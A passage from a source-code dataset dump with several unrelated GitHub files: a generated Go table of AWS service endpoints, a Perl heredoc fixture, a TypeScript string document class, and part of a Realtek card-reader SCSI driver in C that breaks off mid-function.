text
stringlengths 2
100k
| meta
dict |
---|---|
package endpoints
// THIS FILE IS AUTOMATICALLY GENERATED. DO NOT EDIT.
// endpointStruct is the root of the generated endpoint table: a schema
// version plus a map keyed by "region/service" pattern ("*" acts as a
// wildcard on either side of the slash).
type endpointStruct struct {
	Version   int
	Endpoints map[string]endpointEntry
}

// endpointEntry describes how to reach one service: an endpoint host
// template (the {service}/{region} placeholders are presumably substituted
// by the lookup code — confirm there) and, when non-empty, a fixed region
// to use when signing requests.
type endpointEntry struct {
	Endpoint      string
	SigningRegion string
}
// endpointsMap resolves "region/service" keys to endpoint overrides.
// Keys use "*" as a wildcard; entries with an empty Endpoint presumably
// fall back to the default host pattern while still forcing the
// SigningRegion — confirm in the lookup code. This table is generated;
// regenerate rather than hand-edit.
var endpointsMap = endpointStruct{
	Version: 2,
	Endpoints: map[string]endpointEntry{
		"*/*": {
			Endpoint: "{service}.{region}.amazonaws.com",
		},
		"*/cloudfront": {
			Endpoint:      "cloudfront.amazonaws.com",
			SigningRegion: "us-east-1",
		},
		"*/cloudsearchdomain": {
			Endpoint:      "",
			SigningRegion: "us-east-1",
		},
		"*/data.iot": {
			Endpoint:      "",
			SigningRegion: "us-east-1",
		},
		"*/ec2metadata": {
			// Link-local instance metadata service address.
			Endpoint: "http://169.254.169.254/latest",
		},
		"*/iam": {
			Endpoint:      "iam.amazonaws.com",
			SigningRegion: "us-east-1",
		},
		"*/importexport": {
			Endpoint:      "importexport.amazonaws.com",
			SigningRegion: "us-east-1",
		},
		"*/route53": {
			Endpoint:      "route53.amazonaws.com",
			SigningRegion: "us-east-1",
		},
		"*/s3": {
			Endpoint: "s3-{region}.amazonaws.com",
		},
		"*/s3/dualstack": {
			Endpoint: "s3.dualstack.{region}.amazonaws.com",
		},
		"*/sts": {
			Endpoint:      "sts.amazonaws.com",
			SigningRegion: "us-east-1",
		},
		"*/waf": {
			Endpoint:      "waf.amazonaws.com",
			SigningRegion: "us-east-1",
		},
		"cn-north-1/*": {
			Endpoint: "{service}.{region}.amazonaws.com.cn",
		},
		"cn-north-1/ec2metadata": {
			Endpoint: "http://169.254.169.254/latest",
		},
		"eu-central-1/s3": {
			Endpoint: "{service}.{region}.amazonaws.com",
		},
		"us-east-1/s3": {
			Endpoint: "s3.amazonaws.com",
		},
		"us-east-1/sdb": {
			Endpoint:      "sdb.amazonaws.com",
			SigningRegion: "us-east-1",
		},
		"us-gov-west-1/ec2metadata": {
			Endpoint: "http://169.254.169.254/latest",
		},
		"us-gov-west-1/iam": {
			Endpoint: "iam.us-gov.amazonaws.com",
		},
		"us-gov-west-1/s3": {
			Endpoint: "s3-{region}.amazonaws.com",
		},
		"us-gov-west-1/sts": {
			Endpoint: "sts.us-gov-west-1.amazonaws.com",
		},
	},
}
| {
"pile_set_name": "Github"
} |
# Heredoc fixture: four `say` statements, one per heredoc delimiter style.
# NOTE(review): the <selection> markers inside the first body look like
# editor-test annotations and are preserved verbatim.
# Double-quoted heredoc: $variable interpolates.
say <<"EOM";
te<selection>st$variable</selection> blabla
EOM
# Bare <<EOM behaves like a double-quoted heredoc ($variable interpolates).
say <<EOM;
other test$variable blabla
EOM
# Single-quoted heredoc: no interpolation, $variable stays literal.
say <<'EOM';
other test$variable blabla
EOM
# Backtick heredoc: the body is executed as a shell command.
say <<`EOM`;
test$variable blabla
EOM
| {
"pile_set_name": "Github"
} |
/*
* This file is part of CoCalc: Copyright © 2020 Sagemath, Inc.
* License: AGPLv3 s.t. "Commons Clause" – see LICENSE.md for details
*/
import { CompressedPatch, Document } from "../generic/types";
import { apply_patch, make_patch } from "../generic/util";
// An immutable Document implementation backed by a plain string.
export class StringDocument implements Document {
  constructor(private readonly value: string = "") {}

  /** The raw string contents. */
  public to_str(): string {
    return this.value;
  }

  /** Whether `other` exists and holds exactly the same string. */
  public is_equal(other?: StringDocument): boolean {
    return other != null && this.value === other.value;
  }

  /** A new document with `patch` applied to this one's contents. */
  public apply_patch(patch: CompressedPatch): StringDocument {
    const [patched] = apply_patch(patch, this.value);
    return new StringDocument(patched);
  }

  /** The patch that transforms this document's contents into `other`'s. */
  public make_patch(other: StringDocument): CompressedPatch {
    return make_patch(this.value, other.value);
  }

  /** A new document holding `x`; only strings are accepted. */
  public set(x: any): StringDocument {
    if (typeof x !== "string") {
      throw Error("x must be a string");
    }
    return new StringDocument(x);
  }

  public get(_?: any): any {
    throw Error("get queries on strings don't have meaning");
  }

  public get_one(_?: any): any {
    throw Error("get_one queries on strings don't have meaning");
  }

  public delete(_?: any): StringDocument {
    throw Error("delete on strings doesn't have meaning");
  }

  public changes(_?: StringDocument): any {
    // Intentionally a no-op; meaningful for other doc types (e.g. db-doc).
    return undefined;
  }

  /** Number of characters in the document. */
  public count(): number {
    return this.value.length;
  }
}
| {
"pile_set_name": "Github"
} |
/* Driver for Realtek PCI-Express card reader
*
* Copyright(c) 2009 Realtek Semiconductor Corp. All rights reserved.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2, or (at your option) any
* later version.
*
* This program is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, see <http://www.gnu.org/licenses/>.
*
* Author:
* wwang ([email protected])
* No. 450, Shenhu Road, Suzhou Industry Park, Suzhou, China
*/
#include <linux/blkdev.h>
#include <linux/kthread.h>
#include <linux/sched.h>
#include <linux/vmalloc.h>
#include "rtsx.h"
#include "rtsx_transport.h"
#include "rtsx_sys.h"
#include "rtsx_card.h"
#include "rtsx_chip.h"
#include "rtsx_scsi.h"
#include "sd.h"
#include "ms.h"
#include "spi.h"
/*
 * scsi_show_command - log the name of an incoming SCSI CDB for debugging.
 * Maps srb->cmnd[0] to a human-readable opcode name; unknown opcodes are
 * additionally dumped as raw hex (up to 16 CDB bytes). TEST_UNIT_READY is
 * not logged, to avoid flooding the log with the host's periodic polls.
 */
void scsi_show_command(struct scsi_cmnd *srb)
{
	char *what = NULL;
	int i, unknown_cmd = 0;

	switch (srb->cmnd[0]) {
	case TEST_UNIT_READY: what = "TEST_UNIT_READY"; break;
	case REZERO_UNIT: what = "REZERO_UNIT"; break;
	case REQUEST_SENSE: what = "REQUEST_SENSE"; break;
	case FORMAT_UNIT: what = "FORMAT_UNIT"; break;
	case READ_BLOCK_LIMITS: what = "READ_BLOCK_LIMITS"; break;
	case REASSIGN_BLOCKS: what = "REASSIGN_BLOCKS"; break;
	case READ_6: what = "READ_6"; break;
	case WRITE_6: what = "WRITE_6"; break;
	case SEEK_6: what = "SEEK_6"; break;
	case READ_REVERSE: what = "READ_REVERSE"; break;
	case WRITE_FILEMARKS: what = "WRITE_FILEMARKS"; break;
	case SPACE: what = "SPACE"; break;
	case INQUIRY: what = "INQUIRY"; break;
	case RECOVER_BUFFERED_DATA: what = "RECOVER_BUFFERED_DATA"; break;
	case MODE_SELECT: what = "MODE_SELECT"; break;
	case RESERVE: what = "RESERVE"; break;
	case RELEASE: what = "RELEASE"; break;
	case COPY: what = "COPY"; break;
	case ERASE: what = "ERASE"; break;
	case MODE_SENSE: what = "MODE_SENSE"; break;
	case START_STOP: what = "START_STOP"; break;
	case RECEIVE_DIAGNOSTIC: what = "RECEIVE_DIAGNOSTIC"; break;
	case SEND_DIAGNOSTIC: what = "SEND_DIAGNOSTIC"; break;
	case ALLOW_MEDIUM_REMOVAL: what = "ALLOW_MEDIUM_REMOVAL"; break;
	case SET_WINDOW: what = "SET_WINDOW"; break;
	case READ_CAPACITY: what = "READ_CAPACITY"; break;
	case READ_10: what = "READ_10"; break;
	case WRITE_10: what = "WRITE_10"; break;
	case SEEK_10: what = "SEEK_10"; break;
	case WRITE_VERIFY: what = "WRITE_VERIFY"; break;
	case VERIFY: what = "VERIFY"; break;
	case SEARCH_HIGH: what = "SEARCH_HIGH"; break;
	case SEARCH_EQUAL: what = "SEARCH_EQUAL"; break;
	case SEARCH_LOW: what = "SEARCH_LOW"; break;
	case SET_LIMITS: what = "SET_LIMITS"; break;
	case READ_POSITION: what = "READ_POSITION"; break;
	case SYNCHRONIZE_CACHE: what = "SYNCHRONIZE_CACHE"; break;
	case LOCK_UNLOCK_CACHE: what = "LOCK_UNLOCK_CACHE"; break;
	case READ_DEFECT_DATA: what = "READ_DEFECT_DATA"; break;
	case MEDIUM_SCAN: what = "MEDIUM_SCAN"; break;
	case COMPARE: what = "COMPARE"; break;
	case COPY_VERIFY: what = "COPY_VERIFY"; break;
	case WRITE_BUFFER: what = "WRITE_BUFFER"; break;
	case READ_BUFFER: what = "READ_BUFFER"; break;
	case UPDATE_BLOCK: what = "UPDATE_BLOCK"; break;
	case READ_LONG: what = "READ_LONG"; break;
	case WRITE_LONG: what = "WRITE_LONG"; break;
	case CHANGE_DEFINITION: what = "CHANGE_DEFINITION"; break;
	case WRITE_SAME: what = "WRITE_SAME"; break;
	case GPCMD_READ_SUBCHANNEL: what = "READ SUBCHANNEL"; break;
	case READ_TOC: what = "READ_TOC"; break;
	case GPCMD_READ_HEADER: what = "READ HEADER"; break;
	case GPCMD_PLAY_AUDIO_10: what = "PLAY AUDIO (10)"; break;
	case GPCMD_PLAY_AUDIO_MSF: what = "PLAY AUDIO MSF"; break;
	case GPCMD_GET_EVENT_STATUS_NOTIFICATION:
		what = "GET EVENT/STATUS NOTIFICATION"; break;
	case GPCMD_PAUSE_RESUME: what = "PAUSE/RESUME"; break;
	case LOG_SELECT: what = "LOG_SELECT"; break;
	case LOG_SENSE: what = "LOG_SENSE"; break;
	case GPCMD_STOP_PLAY_SCAN: what = "STOP PLAY/SCAN"; break;
	case GPCMD_READ_DISC_INFO: what = "READ DISC INFORMATION"; break;
	case GPCMD_READ_TRACK_RZONE_INFO:
		what = "READ TRACK INFORMATION"; break;
	case GPCMD_RESERVE_RZONE_TRACK: what = "RESERVE TRACK"; break;
	case GPCMD_SEND_OPC: what = "SEND OPC"; break;
	case MODE_SELECT_10: what = "MODE_SELECT_10"; break;
	case GPCMD_REPAIR_RZONE_TRACK: what = "REPAIR TRACK"; break;
	/* Opcodes with no kernel-provided symbolic constant: */
	case 0x59: what = "READ MASTER CUE"; break;
	case MODE_SENSE_10: what = "MODE_SENSE_10"; break;
	case GPCMD_CLOSE_TRACK: what = "CLOSE TRACK/SESSION"; break;
	case 0x5C: what = "READ BUFFER CAPACITY"; break;
	case 0x5D: what = "SEND CUE SHEET"; break;
	case GPCMD_BLANK: what = "BLANK"; break;
	case REPORT_LUNS: what = "REPORT LUNS"; break;
	case MOVE_MEDIUM: what = "MOVE_MEDIUM or PLAY AUDIO (12)"; break;
	case READ_12: what = "READ_12"; break;
	case WRITE_12: what = "WRITE_12"; break;
	case WRITE_VERIFY_12: what = "WRITE_VERIFY_12"; break;
	case SEARCH_HIGH_12: what = "SEARCH_HIGH_12"; break;
	case SEARCH_EQUAL_12: what = "SEARCH_EQUAL_12"; break;
	case SEARCH_LOW_12: what = "SEARCH_LOW_12"; break;
	case SEND_VOLUME_TAG: what = "SEND_VOLUME_TAG"; break;
	case READ_ELEMENT_STATUS: what = "READ_ELEMENT_STATUS"; break;
	case GPCMD_READ_CD_MSF: what = "READ CD MSF"; break;
	case GPCMD_SCAN: what = "SCAN"; break;
	case GPCMD_SET_SPEED: what = "SET CD SPEED"; break;
	case GPCMD_MECHANISM_STATUS: what = "MECHANISM STATUS"; break;
	case GPCMD_READ_CD: what = "READ CD"; break;
	case 0xE1: what = "WRITE CONTINUE"; break;
	case WRITE_LONG_2: what = "WRITE_LONG_2"; break;
	case VENDOR_CMND: what = "Realtek's vendor command"; break;
	default: what = "(unknown command)"; unknown_cmd = 1; break;
	}

	if (srb->cmnd[0] != TEST_UNIT_READY) {
		RTSX_DEBUGP("Command %s (%d bytes)\n", what, srb->cmd_len);
	}

	/* For unrecognized opcodes, dump the CDB bytes themselves. */
	if (unknown_cmd) {
		RTSX_DEBUGP("");
		for (i = 0; i < srb->cmd_len && i < 16; i++)
			RTSX_DEBUGPN(" %02x", srb->cmnd[i]);
		RTSX_DEBUGPN("\n");
	}
}
/*
 * set_sense_type - load a canned sense code into the per-LUN sense buffer.
 * Translates a driver-internal SENSE_TYPE_* value into the sense-key /
 * ASC / ASCQ triple that the next REQUEST SENSE will report.
 * (Sense key / ASC / ASCQ meanings per the SPC standard tables.)
 */
void set_sense_type(struct rtsx_chip *chip, unsigned int lun, int sense_type)
{
	switch (sense_type) {
	case SENSE_TYPE_MEDIA_CHANGE:
		/* 06h/28h: UNIT ATTENTION, medium may have changed */
		set_sense_data(chip, lun, CUR_ERR, 0x06, 0, 0x28, 0, 0, 0);
		break;

	case SENSE_TYPE_MEDIA_NOT_PRESENT:
		/* 02h/3Ah: NOT READY, medium not present */
		set_sense_data(chip, lun, CUR_ERR, 0x02, 0, 0x3A, 0, 0, 0);
		break;

	case SENSE_TYPE_MEDIA_LBA_OVER_RANGE:
		/* 05h/21h: ILLEGAL REQUEST, LBA out of range */
		set_sense_data(chip, lun, CUR_ERR, 0x05, 0, 0x21, 0, 0, 0);
		break;

	case SENSE_TYPE_MEDIA_LUN_NOT_SUPPORT:
		/* 05h/25h: ILLEGAL REQUEST, logical unit not supported */
		set_sense_data(chip, lun, CUR_ERR, 0x05, 0, 0x25, 0, 0, 0);
		break;

	case SENSE_TYPE_MEDIA_WRITE_PROTECT:
		/* 07h/27h: DATA PROTECT, write protected */
		set_sense_data(chip, lun, CUR_ERR, 0x07, 0, 0x27, 0, 0, 0);
		break;

	case SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR:
		/* 03h/11h: MEDIUM ERROR, unrecovered read error */
		set_sense_data(chip, lun, CUR_ERR, 0x03, 0, 0x11, 0, 0, 0);
		break;

	case SENSE_TYPE_MEDIA_WRITE_ERR:
		/* 03h/0Ch/02h: MEDIUM ERROR, write error */
		set_sense_data(chip, lun, CUR_ERR, 0x03, 0, 0x0C, 0x02, 0, 0);
		break;

	case SENSE_TYPE_MEDIA_INVALID_CMD_FIELD:
		/* Invalid field in CDB, with sense-key-specific CDB pointer */
		set_sense_data(chip, lun, CUR_ERR, ILGAL_REQ, 0,
			       ASC_INVLD_CDB, ASCQ_INVLD_CDB, CDB_ILLEGAL, 1);
		break;

	case SENSE_TYPE_FORMAT_IN_PROGRESS:
		/* 02h/04h/04h: NOT READY, format in progress */
		set_sense_data(chip, lun, CUR_ERR, 0x02, 0, 0x04, 0x04, 0, 0);
		break;

	case SENSE_TYPE_FORMAT_CMD_FAILED:
		/* 03h/31h/01h: MEDIUM ERROR, format command failed */
		set_sense_data(chip, lun, CUR_ERR, 0x03, 0, 0x31, 0x01, 0, 0);
		break;

#ifdef SUPPORT_MAGIC_GATE
	case SENSE_TYPE_MG_KEY_FAIL_NOT_ESTAB:
		set_sense_data(chip, lun, CUR_ERR, 0x05, 0, 0x6F, 0x02, 0, 0);
		break;

	case SENSE_TYPE_MG_KEY_FAIL_NOT_AUTHEN:
		set_sense_data(chip, lun, CUR_ERR, 0x05, 0, 0x6F, 0x00, 0, 0);
		break;

	case SENSE_TYPE_MG_INCOMPATIBLE_MEDIUM:
		set_sense_data(chip, lun, CUR_ERR, 0x02, 0, 0x30, 0x00, 0, 0);
		break;

	case SENSE_TYPE_MG_WRITE_ERR:
		set_sense_data(chip, lun, CUR_ERR, 0x03, 0, 0x0C, 0x00, 0, 0);
		break;
#endif

#ifdef SUPPORT_SD_LOCK
	case SENSE_TYPE_MEDIA_READ_FORBIDDEN:
		/* Access refused while the SD card is locked/being erased */
		set_sense_data(chip, lun, CUR_ERR, 0x07, 0, 0x11, 0x13, 0, 0);
		break;
#endif

	case SENSE_TYPE_NO_SENSE:
	default:
		/* All-zero sense: no error to report */
		set_sense_data(chip, lun, CUR_ERR, 0, 0, 0, 0, 0, 0);
		break;
	}
}
/*
 * set_sense_data - fill the per-LUN sense buffer used by REQUEST SENSE.
 * @info is stored big-endian in sense->info[0..3]. When @sns_key_info0 is
 * non-zero the sense-key-specific bytes are filled with SKSV set.
 *
 * NOTE(review): (sns_key_info1 & 0xf0) >> 8 is always 0 — the mask keeps
 * bits 4-7 and the shift then discards them. The high byte of the 16-bit
 * sns_key_info1 was probably intended; confirm against the SCSI
 * sense-key-specific field layout before changing.
 */
void set_sense_data(struct rtsx_chip *chip, unsigned int lun, u8 err_code, u8 sense_key,
		    u32 info, u8 asc, u8 ascq, u8 sns_key_info0, u16 sns_key_info1)
{
	struct sense_data_t *sense = &(chip->sense_buffer[lun]);

	sense->err_code = err_code;
	sense->sense_key = sense_key;
	/* Information field, big-endian */
	sense->info[0] = (u8)(info >> 24);
	sense->info[1] = (u8)(info >> 16);
	sense->info[2] = (u8)(info >> 8);
	sense->info[3] = (u8)info;
	/* Additional sense length: bytes following the fixed 8-byte header */
	sense->ad_sense_len = sizeof(struct sense_data_t) - 8;
	sense->asc = asc;
	sense->ascq = ascq;

	if (sns_key_info0 != 0) {
		sense->sns_key_info[0] = SKSV | sns_key_info0;
		sense->sns_key_info[1] = (sns_key_info1 & 0xf0) >> 8;
		sense->sns_key_info[2] = sns_key_info1 & 0x0f;
	}
}
/*
 * test_unit_ready - handle TEST UNIT READY.
 * Fails with "medium not present" when no card is ready; reports a
 * one-shot media-change unit attention the first time a LUN is seen
 * ready (tracked in chip->lun_mc); with SD-lock support, also refuses
 * access to a locked SD card.
 */
static int test_unit_ready(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	unsigned int lun = SCSI_LUN(srb);

	if (!check_card_ready(chip, lun)) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
		return TRANSPORT_FAILED;
	}

	/* First ready after insertion: raise a media-change condition once. */
	if (!(CHK_BIT(chip->lun_mc, lun))) {
		SET_BIT(chip->lun_mc, lun);
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_CHANGE);
		return TRANSPORT_FAILED;
	}

#ifdef SUPPORT_SD_LOCK
	if (get_lun_card(chip, SCSI_LUN(srb)) == SD_CARD) {
		struct sd_info *sd_card = &(chip->sd_card);
		if (sd_card->sd_lock_notify) {
			/* Lock state just changed: report it as a media change. */
			sd_card->sd_lock_notify = 0;
			set_sense_type(chip, lun, SENSE_TYPE_MEDIA_CHANGE);
			return TRANSPORT_FAILED;
		} else if (sd_card->sd_lock_status & SD_LOCKED) {
			set_sense_type(chip, lun, SENSE_TYPE_MEDIA_READ_FORBIDDEN);
			return TRANSPORT_FAILED;
		}
	}
#endif

	return TRANSPORT_GOOD;
}
/*
 * Extra INQUIRY bytes (response offsets 36..55) appended when the MS Pro
 * formatter is advertised — see inquiry(). "MEMORYSTICK" fills bytes
 * 36..46; the remaining bytes describe supported media and features.
 */
static unsigned char formatter_inquiry_str[20] = {
	'M', 'E', 'M', 'O', 'R', 'Y', 'S', 'T', 'I', 'C', 'K',
#ifdef SUPPORT_MAGIC_GATE
	'-', 'M', 'G', /* Byte[47:49] */
#else
	0x20, 0x20, 0x20, /* Byte[47:49] */
#endif

#ifdef SUPPORT_MAGIC_GATE
	0x0B, /* Byte[50]: MG, MS, MSPro, MSXC */
#else
	0x09, /* Byte[50]: MS, MSPro, MSXC */
#endif
	0x00, /* Byte[51]: Category Specific Commands */
	0x00, /* Byte[52]: Access Control and feature */
	0x20, 0x20, 0x20, /* Byte[53:55] */
};
/*
 * inquiry - handle INQUIRY.
 * Builds a standard 36-byte INQUIRY response (8-byte header + vendor/
 * product/revision string chosen by LUN mode), extended to 56 bytes with
 * formatter_inquiry_str when the MS Pro formatter is advertised.
 *
 * NOTE(review): buf is vmalloc'ed to scsi_bufflen(srb) but only the first
 * `sendbytes` bytes are filled before the whole buffer is copied to the
 * host — for requests larger than 36/56 bytes the tail is uninitialized
 * memory. Confirm and consider zero-filling.
 */
static int inquiry(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	unsigned int lun = SCSI_LUN(srb);
	char *inquiry_default = (char *)"Generic-xD/SD/M.S. 1.00 ";
	char *inquiry_sdms = (char *)"Generic-SD/MemoryStick 1.00 ";
	char *inquiry_sd = (char *)"Generic-SD/MMC 1.00 ";
	char *inquiry_ms = (char *)"Generic-MemoryStick 1.00 ";
	char *inquiry_string;
	unsigned char sendbytes;
	unsigned char *buf;
	u8 card = get_lun_card(chip, lun);
	int pro_formatter_flag = 0;
	/* Fixed 8-byte INQUIRY header: direct-access device, removable. */
	unsigned char inquiry_buf[] = {
		QULIFIRE|DRCT_ACCESS_DEV,
		RMB_DISC|0x0D,
		0x00,
		0x01,
		0x1f,
		0x02,
		0,
		REL_ADR|WBUS_32|WBUS_16|SYNC|LINKED|CMD_QUE|SFT_RE,
	};

	/* Pick the product string matching the LUN layout. */
	if (CHECK_LUN_MODE(chip, SD_MS_2LUN)) {
		if (chip->lun2card[lun] == SD_CARD) {
			inquiry_string = inquiry_sd;
		} else {
			inquiry_string = inquiry_ms;
		}
	} else if (CHECK_LUN_MODE(chip, SD_MS_1LUN)) {
		inquiry_string = inquiry_sdms;
	} else {
		inquiry_string = inquiry_default;
	}

	buf = vmalloc(scsi_bufflen(srb));
	if (buf == NULL) {
		TRACE_RET(chip, TRANSPORT_ERROR);
	}

	/* Formatter mode applies only to (potential) Memory Stick LUNs. */
#ifdef SUPPORT_MAGIC_GATE
	if ((chip->mspro_formatter_enable) &&
	    (chip->lun2card[lun] & MS_CARD))
#else
	if (chip->mspro_formatter_enable)
#endif
	{
		if (!card || (card == MS_CARD)) {
			pro_formatter_flag = 1;
		}
	}

	/* 56-byte extended response in formatter mode, else standard 36. */
	if (pro_formatter_flag) {
		if (scsi_bufflen(srb) < 56) {
			sendbytes = (unsigned char)(scsi_bufflen(srb));
		} else {
			sendbytes = 56;
		}
	} else {
		if (scsi_bufflen(srb) < 36) {
			sendbytes = (unsigned char)(scsi_bufflen(srb));
		} else {
			sendbytes = 36;
		}
	}

	if (sendbytes > 8) {
		memcpy(buf, inquiry_buf, 8);
		memcpy(buf + 8, inquiry_string, sendbytes - 8);
		if (pro_formatter_flag) {
			/* Additional Length */
			buf[4] = 0x33;
		}
	} else {
		memcpy(buf, inquiry_buf, sendbytes);
	}

	if (pro_formatter_flag) {
		if (sendbytes > 36) {
			memcpy(buf + 36, formatter_inquiry_str, sendbytes - 36);
		}
	}

	scsi_set_resid(srb, 0);
	rtsx_stor_set_xfer_buf(buf, scsi_bufflen(srb), srb);
	vfree(buf);

	return TRANSPORT_GOOD;
}
/*
 * start_stop_unit - handle START STOP UNIT.
 * STOP is a no-op, UNLOAD ejects the card if present, LOAD/READY succeed
 * only when a card is ready; any other power-condition value is an error.
 */
static int start_stop_unit(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	unsigned int lun = SCSI_LUN(srb);

	scsi_set_resid(srb, scsi_bufflen(srb));

	/* IMMED bit set: the host does not wait, just acknowledge. */
	if (srb->cmnd[1] == 1)
		return TRANSPORT_GOOD;

	switch (srb->cmnd[4]) {
	case STOP_MEDIUM:
		/* Nothing to power down on this reader. */
		return TRANSPORT_GOOD;

	case UNLOAD_MEDIUM:
		/* Eject the card if one is inserted. */
		if (check_card_ready(chip, lun))
			eject_card(chip, lun);
		return TRANSPORT_GOOD;

	case MAKE_MEDIUM_READY:
	case LOAD_MEDIUM:
		if (!check_card_ready(chip, lun)) {
			set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}
		return TRANSPORT_GOOD;
	}

	/* Unrecognized power condition. */
	TRACE_RET(chip, TRANSPORT_ERROR);
}
/*
 * allow_medium_removal - handle PREVENT ALLOW MEDIUM REMOVAL.
 * This reader cannot lock its media, so "prevent" requests are rejected
 * as an invalid CDB field; "allow" requests succeed trivially.
 */
static int allow_medium_removal(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	/* Byte 4, bit 0 is the PREVENT flag. */
	int prevent_flag = srb->cmnd[4] & 0x1;

	scsi_set_resid(srb, 0);

	if (!prevent_flag)
		return TRANSPORT_GOOD;

	set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
	TRACE_RET(chip, TRANSPORT_FAILED);
}
static int request_sense(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
struct sense_data_t *sense;
unsigned int lun = SCSI_LUN(srb);
struct ms_info *ms_card = &(chip->ms_card);
unsigned char *tmp, *buf;
sense = &(chip->sense_buffer[lun]);
if ((get_lun_card(chip, lun) == MS_CARD) && ms_card->pro_under_formatting) {
if (ms_card->format_status == FORMAT_SUCCESS) {
set_sense_type(chip, lun, SENSE_TYPE_NO_SENSE);
ms_card->pro_under_formatting = 0;
ms_card->progress = 0;
} else if (ms_card->format_status == FORMAT_IN_PROGRESS) {
/* Logical Unit Not Ready Format in Progress */
set_sense_data(chip, lun, CUR_ERR, 0x02, 0, 0x04, 0x04,
0, (u16)(ms_card->progress));
} else {
/* Format Command Failed */
set_sense_type(chip, lun, SENSE_TYPE_FORMAT_CMD_FAILED);
ms_card->pro_under_formatting = 0;
ms_card->progress = 0;
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
}
buf = vmalloc(scsi_bufflen(srb));
if (buf == NULL) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
tmp = (unsigned char *)sense;
memcpy(buf, tmp, scsi_bufflen(srb));
rtsx_stor_set_xfer_buf(buf, scsi_bufflen(srb), srb);
vfree(buf);
scsi_set_resid(srb, 0);
/* Reset Sense Data */
set_sense_type(chip, lun, SENSE_TYPE_NO_SENSE);
return TRANSPORT_GOOD;
}
/*
 * ms_mode_sense - build MODE SENSE data for a Memory Stick LUN.
 * Emits the 4-byte (MODE_SENSE) or 8-byte (MODE_SENSE_10) header, the
 * vendor page 0x20, and — space permitting — up to 96 bytes of the
 * card's raw system/attribute information at @sys_info_offset.
 * Output is truncated to @buf_len; nothing is written past @data_size.
 */
static void ms_mode_sense(struct rtsx_chip *chip, u8 cmd,
			  int lun, u8 *buf, int buf_len)
{
	struct ms_info *ms_card = &(chip->ms_card);
	int sys_info_offset;
	int data_size = buf_len;
	int support_format = 0;
	int i = 0;

	if (cmd == MODE_SENSE) {
		sys_info_offset = 8;
		/* Cap at the 6-byte-command response size (0x68 bytes). */
		if (data_size > 0x68) {
			data_size = 0x68;
		}
		buf[i++] = 0x67; /* Mode Data Length */
	} else {
		sys_info_offset = 12;
		if (data_size > 0x6C) {
			data_size = 0x6C;
		}
		buf[i++] = 0x00; /* Mode Data Length (MSB) */
		buf[i++] = 0x6A; /* Mode Data Length (LSB) */
	}

	/* Medium Type Code */
	if (check_card_ready(chip, lun)) {
		if (CHK_MSXC(ms_card)) {
			support_format = 1;
			buf[i++] = 0x40;
		} else if (CHK_MSPRO(ms_card)) {
			support_format = 1;
			buf[i++] = 0x20;
		} else {
			buf[i++] = 0x10;
		}

		/* WP */
		if (check_card_wp(chip, lun)) {
			buf[i++] = 0x80;
		} else {
			buf[i++] = 0x00;
		}
	} else {
		buf[i++] = 0x00; /* MediaType */
		buf[i++] = 0x00; /* WP */
	}

	buf[i++] = 0x00; /* Reserved */

	if (cmd == MODE_SENSE_10) {
		buf[i++] = 0x00; /* Reserved */
		buf[i++] = 0x00; /* Block descriptor length(MSB) */
		buf[i++] = 0x00; /* Block descriptor length(LSB) */

		/* The Following Data is the content of "Page 0x20" */
		if (data_size >= 9)
			buf[i++] = 0x20; /* Page Code */
		if (data_size >= 10)
			buf[i++] = 0x62; /* Page Length */
		if (data_size >= 11)
			buf[i++] = 0x00; /* No Access Control */
		if (data_size >= 12) {
			if (support_format) {
				buf[i++] = 0xC0; /* SF, SGM */
			} else {
				buf[i++] = 0x00;
			}
		}
	} else {
		/* The Following Data is the content of "Page 0x20" */
		if (data_size >= 5)
			buf[i++] = 0x20; /* Page Code */
		if (data_size >= 6)
			buf[i++] = 0x62; /* Page Length */
		if (data_size >= 7)
			buf[i++] = 0x00; /* No Access Control */
		if (data_size >= 8) {
			if (support_format) {
				buf[i++] = 0xC0; /* SF, SGM */
			} else {
				buf[i++] = 0x00;
			}
		}
	}

	if (data_size > sys_info_offset) {
		/* 96 Bytes Attribute Data */
		int len = data_size - sys_info_offset;
		len = (len < 96) ? len : 96;

		memcpy(buf + sys_info_offset, ms_card->raw_sys_info, len);
	}
}
/*
 * mode_sense - handle MODE SENSE(6) / MODE SENSE(10).
 * Only pages 0x00, 0x1C, 0x3F and (in MS formatter mode) 0x20 are
 * accepted. Pages 0x3F/0x20 are served by ms_mode_sense(); anything else
 * gets a minimal mode header whose WP bit mirrors the card's
 * write-protect state. Other page codes fail with "invalid CDB field".
 */
static int mode_sense(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	unsigned int lun = SCSI_LUN(srb);
	unsigned int dataSize;
	int status;
	int pro_formatter_flag;
	unsigned char pageCode, *buf;
	u8 card = get_lun_card(chip, lun);

#ifndef SUPPORT_MAGIC_GATE
	if (!check_card_ready(chip, lun)) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
		scsi_set_resid(srb, scsi_bufflen(srb));
		TRACE_RET(chip, TRANSPORT_FAILED);
	}
#endif

	pro_formatter_flag = 0;
	/* Minimal header by default; 108 bytes when the MS formatter page
	 * may be requested. */
	dataSize = 8;
#ifdef SUPPORT_MAGIC_GATE
	if ((chip->lun2card[lun] & MS_CARD)) {
		if (!card || (card == MS_CARD)) {
			dataSize = 108;
			if (chip->mspro_formatter_enable) {
				pro_formatter_flag = 1;
			}
		}
	}
#else
	if (card == MS_CARD) {
		if (chip->mspro_formatter_enable) {
			pro_formatter_flag = 1;
